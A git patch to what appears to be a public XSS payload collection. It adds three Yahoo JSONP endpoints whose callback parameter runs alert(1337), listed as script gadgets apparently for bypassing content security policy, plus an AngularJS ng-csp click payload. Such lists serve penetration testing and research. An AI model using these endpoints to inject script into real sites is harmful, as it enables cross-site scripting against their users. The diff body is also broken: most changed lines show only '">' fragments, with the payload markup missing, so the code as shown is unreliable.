From aef5bb864ae2050c7b8e071b3a39742a4918a1c9 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Fri, 25 Oct 2019 22:27:16 +0530 Subject: [PATCH] Update jsonp_endpoint.txt Added 3 yahoo jsonp endpoints * https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337) * https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337) * https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y- --- XSS Injection/Intruders/jsonp_endpoint.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt index e514d81..12add24 100644 --- a/XSS Injection/Intruders/jsonp_endpoint.txt +++ b/XSS Injection/Intruders/jsonp_endpoint.txt @@ -24,6 +24,9 @@ #Uber.com: "> #AOL/Yahoo +"> +"> +"> "> "> "> @@ -51,4 +54,4 @@ #GoogleAPI's "> "> -ng-app"ng-csp ng-click=$event.view.alert(1337)> \ No newline at end of file +ng-app"ng-csp ng-click=$event.view.alert(1337)>